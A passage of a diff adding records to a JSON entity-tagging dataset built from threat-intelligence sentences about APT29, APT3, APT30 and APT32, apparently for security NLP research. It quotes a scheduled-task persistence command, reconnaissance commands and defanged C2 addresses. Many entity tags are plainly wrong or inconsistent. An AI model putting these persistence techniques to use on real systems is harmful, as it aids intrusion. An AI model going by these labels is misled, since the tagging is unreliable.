"O", + "O", + "O", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "installed", + "web", + "shells", + "on", + "exploited", + "Microsoft", + "Exchange", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "used", + "WMI", + "to", + "steal", + "credentials", + "and", + "execute", + "backdoors", + "at", + "a", + "future", + "time." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT29", + "has", + "used", + "WMI", + "event", + "subscriptions", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "replaces", + "the", + "Sticky", + "Keys", + "binary", + "<code>C:\\Windows\\System32\\sethc.exe</code>", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "been", + "known", + "to", + "add", + "created", + "accounts", + "to", + "local", + "admin", + "groups", + "to", + "maintain", + "elevated", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "B-Org", + "I-Org", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "used", + "tools", + "to", + "compress", + "data", + "before", + "exfilling", + "it." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "can", + "locate", + "credentials", + "in", + "files", + "on", + "the", + "file", + "system", + "such", + "as", + "those", + "from", + "Firefox", + "or", + "Chrome." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "used", + "tools", + "to", + "dump", + "passwords", + "from", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "been", + "known", + "to", + "side", + "load", + "DLLs", + "with", + "a", + "valid", + "version", + "of", + "Chrome", + "with", + "one", + "of", + "their", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "will", + "identify", + "Microsoft", + "Office", + "documents", + "on", + "the", + "victim's", + "computer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "leverages", + "valid", + "accounts", + "after", + "gaining", + "credentials", + "for", + "use", + "within", + "the", + "victim", + "domain." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "exfiltrates", + "data", + "over", + "the", + "C2", + "channel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "exploited", + "the", + "Adobe", + "Flash", + "Player", + "vulnerability", + "CVE-2015-3113", + "and", + "Internet", + "Explorer", + "vulnerability", + "CVE-2014-1776." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features", + "O", + "O", + "I-Exp", + "I-Exp", + "B-Features" + ] + }, + { + "tokens": [ + "An", + "APT3", + "downloader", + "establishes", + "SOCKS5", + "connections", + "for", + "its", + "initial", + "C2." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "can", + "delete", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "looks", + "for", + "files", + "and", + "directories", + "on", + "the", + "local", + "file", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "been", + "known", + "to", + "use", + "<code>-WindowStyle", + "Hidden</code>", + "to", + "conceal", + "PowerShell", + "windows." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "APT3", + "has", + "been", + "known", + "to", + "remove", + "indicators", + "of", + "compromise", + "from", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "can", + "copy", + "files", + "to", + "remote", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "used", + "a", + "keylogging", + "tool", + "that", + "records", + "keystrokes", + "in", + "encrypted", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "used", + "a", + "tool", + "to", + "dump", + "credentials", + "by", + "injecting", + "itself", + "into", + "lsass.exe", + "and", + "triggering", + "with", + "the", + "argument", + "\"dig.\"" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "used", + "a", + "tool", + "that", + "can", + "obtain", + "info", + "about", + "local", + "and", + "global", + "group", + "users,", + "power", + "users,", + "and", + "administrators." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "O", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "APT3", + "has", + "been", + "known", + "to", + "create", + "or", + "enable", + "accounts,", + "such", + "as", + "<code>support_388945a0</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "been", + "known", + "to", + "stage", + "files", + "for", + "exfiltration", + "in", + "a", + "single", + "location." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-OffAct", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "lured", + "victims", + "into", + "clicking", + "malicious", + "links", + "delivered", + "through", + "spearphishing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "An", + "APT3", + "downloader", + "first", + "establishes", + "a", + "SOCKS5", + "connection", + "to", + "192.157.198[.]103", + "using", + "TCP", + "port", + "1913;", + "once", + "the", + "server", + "response", + "is", + "verified,", + "it", + "then", + "requests", + "a", + "connection", + "to", + "192.184.60[.]229", + "on", + "TCP", + "port", + "81." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT3", + "downloader", + "establishes", + "SOCKS5", + "connections", + "for", + "its", + "initial", + "C2." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "obfuscates", + "files", + "or", + "information", + "to", + "help", + "evade", + "defensive", + "measures." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "been", + "known", + "to", + "brute", + "force", + "password", + "hashes", + "to", + "be", + "able", + "to", + "leverage", + "plain", + "text", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "can", + "enumerate", + "the", + "permissions", + "associated", + "with", + "Windows", + "groups." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "used", + "PowerShell", + "on", + "victim", + "systems", + "to", + "download", + "and", + "run", + "payloads", + "after", + "exploitation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "can", + "list", + "out", + "currently", + "running", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "places", + "scripts", + "in", + "the", + "startup", + "folder", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "enables", + "the", + "Remote", + "Desktop", + "Protocol", + "for", + "persistence.", + "APT3", + "has", + "also", + "interacted", + "with", + "compromised", + "systems", + "to", + "browse", + "and", + "copy", + "files", + "through", + "RDP", + "sessions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "can", + "detect", + "the", + "existence", + "of", + "remote", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "can", + "run", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT3", + "will", + "copy", + "files", + "over", + "to", + "Windows", + "Admin", + "Shares", + "(like", + "ADMIN$)", + "as", + "part", + "of", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT3", + "downloader", + "creates", + "persistence", + "by", + "creating", + "the", + "following", + "scheduled", + "task:", + "<code>schtasks", + "/create", + "/tn", + "\"mysc\"", + "/tr", + "C:\\Users\\Public\\test.exe", + "/sc", + "ONLOGON", + "/ru", + "\"System\"</code>." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "been", + "known", + "to", + "pack", + "their", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "can", + "obtain", + "information", + "about", + "the", + "local", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "keylogging", + "tool", + "used", + "by", + "APT3", + "gathers", + "network", + "information", + "from", + "the", + "victim,", + "including", + "the", + "MAC", + "address,", + "IP", + "address,", + "WINS,", + "DHCP", + "server,", + "and", + "gateway." + ], + "ner_tags": [ + "O", + "B-Tool", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "can", + "enumerate", + "current", + "network", + "connections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT3", + "downloader", + "uses", + "the", + "Windows", + "command", + "<code>\"cmd.exe\"", + "/C", + "whoami</code>", + "to", + "verify", + "that", + "it", + "is", + "running", + "with", + "the", + "elevated", + "privileges", + "of", + "“System.”" + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT3", + "downloader", + "uses", + "the", + "Windows", + "command", + "<code>\"cmd.exe\"", + "/C", + "whoami</code>.", + "The", + "group", + "also", + "uses", + "a", + "tool", + "to", + "execute", + "commands", + "on", + "remote", + "computers." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT3", + "has", + "a", + "tool", + "that", + "creates", + "a", + "new", + "service", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT30", + "has", + "relied", + "on", + "users", + "to", + "execute", + "malicious", + "file", + "attachments", + "delivered", + "via", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT30", + "has", + "used", + "spearphishing", + "emails", + "with", + "malicious", + "DOC", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32's", + "backdoor", + "has", + "used", + "LZMA", + "compression", + "and", + "RC4", + "encryption", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "includes", + "garbage", + "code", + "to", + "mislead", + "anti-malware", + "software", + "and", + "researchers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "cleared", + "select", + "event", + "log", + "entries." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "the", + "`Invoke-Obfuscation`", + "framework", + "to", + "obfuscate", + "their", + "PowerShell." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "COM", + "scriptlets", + "to", + "download", + "Cobalt", + "Strike", + "beacons." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT32", + "used", + "Outlook", + "Credential", + "Dumper", + "to", + "harvest", + "credentials", + "stored", + "in", + "Windows", + "registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "ran", + "legitimately-signed", + "executables", + "from", + "Symantec", + "and", + "McAfee", + "which", + "load", + "a", + "malicious", + "DLL.", + "The", + "group", + "also", + "side-loads", + "its", + "backdoor", + "by", + "dropping", + "a", + "library", + "and", + "a", + "legitimate,", + "signed", + "executable", + "(AcroTranscoder)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "set", + "up", + "and", + "operated", + "websites", + "to", + "gather", + "information", + "and", + "deliver", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "B-Purp" + ] + }, + { + "tokens": [ + "APT32", + "has", + "infected", + "victims", + "by", + "tricking", + "them", + "into", + "visiting", + "compromised", + "watering", + "hole", + "websites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "stood", + "up", + "websites", + "containing", + "numerous", + "articles", + "and", + "content", + "scraped", + "from", + "the", + "Internet", + "to", + "make", + "them", + "appear", + "legitimate,", + "but", + "some", + "of", + "these", + "pages", + "include", + "malicious", + "JavaScript", + "to", + "profile", + "the", + "potential", + "victim", + "or", + "infect", + "them", + "via", + "a", + "fake", + "software", + "update." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "collected", + "e-mail", + "addresses", + "for", + "activists", + "and", + "bloggers", + "in", + "order", + "to", + "target", + "them", + "with", + "spyware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "B-Org", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "performed", + "code", + "obfuscation,", + "including", + "encoding", + "payloads", + "using", + "Base64", + "and", + "using", + "a", + "framework", + "called", + "\"Dont-Kill-My-Cat", + "(DKMC).", + "APT32", + "also", + "encrypts", + "the", + "library", + "used", + "for", + "network", + "exfiltration", + "with", + "AES-256", + "in", + "CBC", + "mode", + "in", + "their", + "macOS", + "backdoor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32's", + "backdoor", + "has", + "exfiltrated", + "data", + "using", + "the", + "already", + "opened", + "channel", + "with", + "its", + "C&C", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32's", + "backdoor", + "can", + "exfiltrate", + "data", + "by", + "encoding", + "it", + "in", + "the", + "subdomain", + "field", + "of", + "DNS", + "packets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "RTF", + "document", + "that", + "includes", + "an", + "exploit", + "to", + "execute", + "malicious", + "code.", + "(CVE-2017-11882)" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "CVE-2016-7255", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32's", + "macOS", + "backdoor", + "can", + "receive", + "a", + "“delete”", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32's", + "backdoor", + "possesses", + "the", + "capability", + "to", + "list", + "files", + "and", + "directories", + "on", + "a", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32's", + "backdoor", + "has", + "stored", + "its", + "configuration", + "in", + "a", + "registry", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "conducted", + "targeted", + "surveillance", + "against", + "activists", + "and", + "bloggers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-OffAct", + "O", + "O", + "B-Org", + "O", + "B-Org" + ] + }, + { + "tokens": [ + "APT32's", + "macOS", + "backdoor", + "hides", + "the", + "clientID", + "file", + "via", + "a", + "chflags", + "function." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "the", + "WindowStyle", + "parameter", + "to", + "conceal", + "PowerShell", + "windows." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "added", + "JavaScript", + "to", + "victim", + "websites", + "to", + "download", + "additional", + "frameworks", + "that", + "profile", + "and", + "compromise", + "website", + "visitors." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "JavaScript", + "for", + "drive-by", + "downloads", + "and", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "abused", + "the", + "PasswordChangeNotify", + "to", + "monitor", + "for", + "and", + "capture", + "account", + "password", + "changes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "used", + "Mimikatz", + "and", + "customized", + "versions", + "of", + "Windows", + "Credential", + "Dumper", + "to", + "harvest", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "deployed", + "tools", + "after", + "moving", + "laterally", + "using", + "administrative", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT32's", + "macOS", + "backdoor", + "changes", + "the", + "permission", + "of", + "the", + "file", + "it", + "wants", + "to", + "execute", + "to", + "755." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "enumerated", + "administrative", + "users", + "using", + "the", + "commands", + "<code>net", + "localgroup", + "administrators</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "legitimate", + "local", + "admin", + "account", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "email", + "for", + "C2", + "via", + "an", + "Office", + "macro." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "attempted", + "to", + "lure", + "users", + "to", + "execute", + "a", + "malicious", + "dropper", + "delivered", + "via", + "a", + "spearphishing", + "attachment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "lured", + "targets", + "to", + "download", + "a", + "Cobalt", + "Strike", + "beacon", + "by", + "including", + "a", + "malicious", + "link", + "within", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "hidden", + "or", + "non-printing", + "characters", + "to", + "help", + "masquerade", + "service", + "names,", + "such", + "as", + "appending", + "a", + "Unicode", + "no-break", + "space", + "character", + "to", + "a", + "legitimate", + "service", + "name.", + "APT32", + "has", + "also", + "impersonated", + "the", + "legitimate", + "Flash", + "installer", + "file", + "name", + "\"install_flashplayer.exe\"." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Exp", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "APT32", + "has", + "disguised", + "a", + "Cobalt", + "Strike", + "beacon", + "as", + "a", + "Flash", + "Installer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "I-Exp", + "B-Exp" + ] + }, + { + "tokens": [ + "APT32", + "has", + "renamed", + "a", + "NetCat", + "binary", + "to", + "kb-10233.exe", + "to", + "masquerade", + "as", + "a", + "Windows", + "update.", + "APT32", + "has", + "also", + "renamed", + "a", + "Cobalt", + "Strike", + "beacon", + "payload", + "to", + "install_flashplayers.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "APT32's", + "backdoor", + "has", + "modified", + "the", + "Windows", + "Registry", + "to", + "store", + "the", + "backdoor's", + "configuration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "mshta.exe", + "for", + "code", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "used", + "NTFS", + "alternate", + "data", + "streams", + "to", + "hide", + "their", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "performed", + "network", + "scanning", + "on", + "the", + "network", + "to", + "search", + "for", + "open", + "ports,", + "services,", + "OS", + "finger-printing,", + "and", + "other", + "vulnerabilities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "used", + "the", + "<code>net", + "view</code>", + "command", + "to", + "show", + "all", + "shares", + "available,", + "including", + "the", + "administrative", + "shares", + "such", + "as", + "<code>C$</code>", + "and", + "<code>ADMIN$</code>." + ], + "ner_tags": [ + 